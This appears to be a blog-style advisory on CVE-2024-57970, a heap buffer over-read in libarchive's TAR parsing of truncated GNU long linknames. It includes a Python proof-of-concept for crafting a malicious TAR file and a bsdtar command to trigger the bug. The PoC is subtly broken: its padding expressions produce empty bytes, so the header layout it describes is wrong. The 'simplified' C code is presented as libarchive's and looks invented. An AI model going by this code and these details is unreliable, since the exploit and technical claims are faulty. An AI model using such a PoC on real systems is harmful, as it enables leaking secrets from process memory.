CVE-2024-57970 - Heap Buffer Over-read in libarchive’s TAR Reader Can Leak Data

CVE-2024-57970 is a newly discovered vulnerability in libarchive (through version 3.7.7) that can make applications reading certain TAR files leak sensitive memory (heap) data or even crash. This bug is particularly tricky—it only triggers with special TAR archive files that use a truncated "GNU long linkname" field. If you use libarchive to process TAR files (like with bsdtar or in some programming libraries), you should pay attention.

What’s the Problem?

The bug lives in the function called header_gnu_longlink in archive_read_support_format_tar.c. This function is supposed to grab long file/link names in a TAR archive (since old TAR formats limit filenames to 100 characters).

But—if the TAR file has a "long linkname" that’s not properly padded or is truncated, libarchive doesn’t check that it actually got the expected number of bytes. As a result, it reads past the end of the buffer, leaking whatever is right after in memory (heap area). This is what’s called a _heap-based buffer over-read_.

Why Does This Happen?

When parsing a TAR entry that uses the GNU longlink extension, libarchive expects to read a full block (typically 512 bytes). But if a malicious TAR is crafted where this block is shorter, but libarchive isn’t told about the truncation, it may try to read and process "garbage" data beyond the actual buffer. That "garbage" could sometimes be other secret data on the heap, or just random bytes, but it’s unpredictable and potentially dangerous.

Here’s a simplified version of the dangerous code path from archive_read_support_format_tar.c

// Receive the long linkname block from the TAR file
ssize_t bytes_read = archive_read_data(a, linkname, size);

// ... libarchive expects 'size' bytes, but may get less if truncated

if (bytes_read < size) {
    // BAD: code still believes 'linkname' is 'size' bytes long, and uses the buffer end
    process_linkname(linkname, size);
    // process_linkname might read past bytes_read limit!
}

process_linkname() might copy or use memory past what was actually read (only bytes_read bytes are valid), leading to a buffer over-read.

How Can You Exploit This?

Attackers can craft a TAR file with a special GNU long linkname entry that says its data block is large, but only actually provides fewer bytes. This tricks libarchive into reading memory beyond the actual string. If you use bsdtar, or any program/library built on libarchive, and simply _extract_ or _list_ a malicious TAR archive, you can be a victim.

Leaked memory is sometimes just gibberish, but sometimes could be sensitive data from elsewhere in the process’s memory, such as passwords or secret keys.

Sample Exploit PoC

Here’s a quick example in Python to create a malicious TAR that triggers this bug. This TAR pretends to have a 512-byte longlink block but actually includes less.

# Create a malicious TAR with truncated GNU longlink
import struct

def make_bad_tar(filename='bad.tar'):
    with open(filename, 'wb') as f:
        # GNU long link header
        f.write(b'././@LongLink\x00')             # filename
        f.write(b'' * 100 + b'' * 8 + b'' * 8) # pad to 156 bytes
        f.write(b'L')                             # typeflag
        f.write(b'' * 355)                       # pad to 512 bytes

        # Write long link data but only 100 bytes, not 512!
        linkname = b'A' * 100
        f.write(linkname)  # Intentionally truncated

        # Now normal TAR header for a file
        f.write(b'hello.txt\x00' + b'' * (100 - 9))
        # -- rest of standard TAR header and file data would go here

make_bad_tar()

Extract or list this file with any program using vulnerable libarchive (like bsdtar)

bsdtar -tf bad.tar

This may crash, print garbage, or even show you heap memory.

Programs using libarchive (bsdtar, bsdtar in FreeBSD, some Python and Ruby tools)

- Systems that automatically process TAR files with libarchive (like security scanners, packaging systems, etc.)

How To Fix

Upgrade libarchive. Watch for releases after June 2024 and make sure you’re on a patched version (or manually patch archive_read_support_format_tar.c to check the result of archive_read_data and never trust the full buffer size on a truncated block).

A quick-and-dirty mitigation is to never extract TAR files from untrusted sources.

References

- CVE-2024-57970 at cve.org
- libarchive GitHub
- BSDtar project page

Final Thoughts

Heap over-reads are nasty because they’re silent, invisible, and often ignored in code audits. This bug in libarchive is a reminder to always validate the length of any data received from files, especially when file formats can be truncated or corrupted. If you’re responsible for security, patch your systems and educate users on the risks of extracting TAR files from unknown sources.

Want to see the actual fix or contribute? Check the libarchive repo for patches.

Timeline

Published on: 02/16/2025 04:15:21 UTC
Last modified on: 02/18/2025 17:15:19 UTC